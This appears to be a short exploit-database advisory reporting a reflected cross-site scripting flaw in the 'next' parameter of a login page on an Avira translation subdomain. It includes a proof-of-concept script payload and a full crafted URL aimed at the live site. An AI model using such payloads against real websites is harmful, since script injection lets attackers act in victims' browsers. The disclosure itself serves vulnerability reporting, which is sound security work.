Avira Cross Site Scripting

2016.02.01
Credit: RootByte
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: AVIRA Subdomain XSS Vulnerability # Google Dork: N/A # Date: 2016/1/29 # Exploit Author: RootByte # Vendor Homepage: http://translate.avira.com # Software Link: N/A # Version: N/A # Tested on: Windows 10 / FireFox # CVE : N/A ~ # Vulnerable Location: http://translate.avira.com/accounts/login/ ~ # Variable: next ~ # Using this script for XSS Vunerability Testing : "><script>prompt(/RootByte/)</script> ~ # Our Finally address is http://translate.avira.com/accounts/login/?csrfmiddlewaretoken=Ukv77qZZeG2BavIGaHNxcgJ6U4045erd&username=3383976&password=5478964&login=Login&language=ach&next="><script>prompt(/RootByte/)</script> # Discovered by: RootByte # Page: https://www.facebook.com/Rootbyte/ # Contact: https://www.facebook.com/groups/RootByte/ InfoSec Consultant / Web Pentester / Wannabe Security Researcher / JDM interested and Tacos addicted.

References:

http://cxsecurity.com/issue/WLB-2015120223


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top